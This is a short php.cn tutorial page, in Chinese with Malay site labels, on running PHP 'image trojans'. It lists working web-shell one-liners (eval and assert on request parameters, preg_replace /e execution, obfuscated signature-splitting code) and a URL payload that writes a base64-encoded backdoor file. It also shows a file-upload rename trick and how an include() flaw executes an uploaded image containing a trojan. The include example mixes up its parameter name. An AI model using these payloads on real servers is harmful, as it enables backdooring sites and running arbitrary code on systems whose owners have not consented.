php图片木马怎么运行-masalah PHP-php.cn

php图片木马怎么运行

王林

Lepaskan： 2023-02-24 12:52:02

asal

12523 orang telah melayarinya

php图片木马怎么运行

PHP图片木马的的运行方法

1、标准的写法,直接通过eval执行php代码

@eval ($_POST[&#39;code&#39;]);

Salin selepas log masuk

2、动态执行assert生成一个木马文件(隐藏性最好的一种)

@$_GET[&#39;a&#39;]($_GET[&#39;code&#39;]);

Salin selepas log masuk

3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件

/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

Salin selepas log masuk

a参数为eval时会报错(因为eval不是函数)木马生成失败，为assert时同样报错，但会生成木马。

4、使用preg_replace执行代码(里面前面只要用一个的任意字符串就可以,如果不一样的话命令可能会被执行多次)

@preg_replace("/re/e", $_POST[&#39;code&#39;], "re");

Salin selepas log masuk

5、把特征码打散

session_start();
$_POST[&#39;code&#39;] && $_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
$_SESSION[&#39;theCode&#39;]&&preg_replace(&#39;\&#39;a\&#39;eis&#39;,&#39;e&#39;.&#39;v&#39;.&#39;a&#39;.&#39;l&#39;.&#39;(base64_decode($_SESSION[\&#39;theCode\&#39;]))&#39;,&#39;a&#39;);

Salin selepas log masuk

6、重命名任意文件

$reg="c"."o"."p"."y";
$reg($_FILES[&#39;filename&#39;][&#39;tmp_name&#39;],$_FILES[&#39;filename&#39;][&#39;name&#39;]);

Salin selepas log masuk

include的漏洞使用方法

有时候我们会上传一些图片木马但是却不能执行,这个时候如果有一个include的漏洞,那么图片木马就可以执行啦。

如果php代码里有一个include($_GET['controller']) 且还有一个url路径为：/index.php?controller=user，这个看起来就是一个根据参数包含执行对应控制器的代码，但是如果url路径里的参数改成这样：/index.php?uid=/upload/images/muma.jpg，这个时候木马就执行啦。

以上内容仅供参考！

推荐教程：PHP视频教程

Atas ialah kandungan terperinci php图片木马怎么运行. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!